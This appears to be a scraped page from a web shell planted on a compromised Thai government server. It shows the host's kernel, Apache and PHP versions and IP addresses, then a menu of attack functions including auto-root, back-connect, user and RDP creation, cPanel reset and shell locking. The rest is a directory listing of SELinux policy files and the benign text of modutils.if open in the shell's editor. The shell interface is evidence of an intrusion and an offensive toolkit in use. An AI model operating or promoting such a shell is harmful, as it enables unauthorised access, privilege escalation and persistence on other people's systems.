Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
selinux /
devel /
include /
system /
[ HOME SHELL ]
Name
Size
Permission
Action
application.if
4.2
KB
-rw-r--r--
authlogin.if
33.85
KB
-rw-r--r--
clock.if
1.9
KB
-rw-r--r--
daemontools.if
4.21
KB
-rw-r--r--
fstools.if
2.95
KB
-rw-r--r--
getty.if
1.72
KB
-rw-r--r--
hostname.if
1.24
KB
-rw-r--r--
hotplug.if
3.29
KB
-rw-r--r--
init.if
41.11
KB
-rw-r--r--
ipsec.if
8
KB
-rw-r--r--
iptables.if
3.27
KB
-rw-r--r--
iscsi.if
1.51
KB
-rw-r--r--
kdump.if
2.18
KB
-rw-r--r--
libraries.if
10.88
KB
-rw-r--r--
locallogin.if
2.85
KB
-rw-r--r--
logging.if
23.83
KB
-rw-r--r--
lvm.if
3.91
KB
-rw-r--r--
miscfiles.if
15.45
KB
-rw-r--r--
modutils.if
6.94
KB
-rw-r--r--
mount.if
7.07
KB
-rw-r--r--
netlabel.if
1013
B
-rw-r--r--
pcmcia.if
3.01
KB
-rw-r--r--
raid.if
1.38
KB
-rw-r--r--
selinuxutil.if
35.72
KB
-rw-r--r--
setrans.if
977
B
-rw-r--r--
sosreport.if
2.41
KB
-rw-r--r--
sysnetwork.if
16.6
KB
-rw-r--r--
udev.if
5.99
KB
-rw-r--r--
unconfined.if
4.33
KB
-rw-r--r--
userdomain.if
103.05
KB
-rw-r--r--
xen.if
4.76
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : modutils.if
## <summary>Policy for kernel module utilities</summary> ###################################### ## <summary> ## Getattr the dependencies of kernel modules. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # interface(`modutils_getattr_module_deps',` gen_require(` type modules_dep_t; type modules_object_t; ') getattr_files_pattern($1, modules_object_t, modules_dep_t) ') ######################################## ## <summary> ## Read the dependencies of kernel modules. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # interface(`modutils_read_module_deps',` gen_require(` type modules_dep_t; ') files_list_kernel_modules($1) allow $1 modules_dep_t:file read_file_perms; ') ####################################### ## <summary> ## list the configuration options used when ## loading modules. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> ## <rolecap/> # interface(`modutils_list_module_config',` gen_require(` type modules_conf_t; ') list_dirs_pattern($1, modules_conf_t, modules_conf_t) ') ######################################## ## <summary> ## Read the configuration options used when ## loading modules. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> ## <rolecap/> # interface(`modutils_read_module_config',` gen_require(` type modules_conf_t; ') # This file type can be in /etc or # /lib(64)?/modules files_search_etc($1) files_search_boot($1) read_files_pattern($1, modules_conf_t, modules_conf_t) read_lnk_files_pattern($1, modules_conf_t, modules_conf_t) ') ######################################## ## <summary> ## Rename a file with the configuration options used when ## loading modules. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # interface(`modutils_rename_module_config',` gen_require(` type modules_conf_t; ') rename_files_pattern($1, modules_conf_t, modules_conf_t) ') ######################################## ## <summary> ## Unlink a file with the configuration options used when ## loading modules. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # interface(`modutils_delete_module_config',` gen_require(` type modules_conf_t; ') delete_files_pattern($1, modules_conf_t, modules_conf_t) ') ######################################## ## <summary> ## Manage files with the configuration options used when ## loading modules. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # interface(`modutils_manage_module_config',` gen_require(` type modules_conf_t; ') manage_files_pattern($1, modules_conf_t, modules_conf_t) ') ######################################## ## <summary> ## Unconditionally execute insmod in the insmod domain. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # # cjp: this is added for pppd, due to nested # conditionals not working. interface(`modutils_domtrans_insmod_uncond',` gen_require(` type insmod_t, insmod_exec_t; ') corecmd_search_bin($1) domtrans_pattern($1, insmod_exec_t, insmod_t) ') ######################################## ## <summary> ## Execute insmod in the insmod domain. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # interface(`modutils_domtrans_insmod',` gen_require(` bool secure_mode_insmod; ') if (!secure_mode_insmod) { modutils_domtrans_insmod_uncond($1) } ') ######################################## ## <summary> ## Execute insmod in the insmod domain, and ## allow the specified role the insmod domain, ## and use the caller's terminal. Has a sigchld ## backchannel. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> ## <param name="role"> ## <summary> ## The role to be allowed the insmod domain. ## </summary> ## </param> ## <rolecap/> # interface(`modutils_run_insmod',` gen_require(` type insmod_t; ') modutils_domtrans_insmod($1) role $2 types insmod_t; ') ######################################## ## <summary> ## Execute insmod in the caller domain. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # interface(`modutils_exec_insmod',` gen_require(` type insmod_exec_t; ') corecmd_search_bin($1) can_exec($1, insmod_exec_t) ') ######################################## ## <summary> ## Execute depmod in the depmod domain. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # interface(`modutils_domtrans_depmod',` gen_require(` type depmod_t, depmod_exec_t; ') corecmd_search_bin($1) domtrans_pattern($1, depmod_exec_t, depmod_t) ') ######################################## ## <summary> ## Execute depmod in the depmod domain. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> ## <param name="role"> ## <summary> ## The role to be allowed the depmod domain. ## </summary> ## </param> ## <rolecap/> # interface(`modutils_run_depmod',` gen_require(` type depmod_t, insmod_t; ') modutils_domtrans_depmod($1) role $2 types depmod_t; ') ######################################## ## <summary> ## Execute depmod in the caller domain. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # interface(`modutils_exec_depmod',` gen_require(` type depmod_exec_t; ') corecmd_search_bin($1) can_exec($1, depmod_exec_t) ') ######################################## ## <summary> ## Execute depmod in the depmod domain. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # interface(`modutils_domtrans_update_mods',` gen_require(` type update_modules_t, update_modules_exec_t; ') corecmd_search_bin($1) domtrans_pattern($1, update_modules_exec_t, update_modules_t) ') ######################################## ## <summary> ## Execute update_modules in the update_modules domain. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> ## <param name="role"> ## <summary> ## The role to be allowed the update_modules domain. ## </summary> ## </param> ## <rolecap/> # interface(`modutils_run_update_mods',` gen_require(` type update_modules_t; ') modutils_domtrans_update_mods($1) role $2 types update_modules_t; modutils_run_insmod(update_modules_t, $2) ') ######################################## ## <summary> ## Execute update_modules in the caller domain. ## </summary> ## <param name="domain"> ## <summary> ## Domain allowed access. ## </summary> ## </param> # interface(`modutils_exec_update_mods',` gen_require(` type update_modules_exec_t; ') corecmd_search_bin($1) can_exec($1, update_modules_exec_t) ')
Close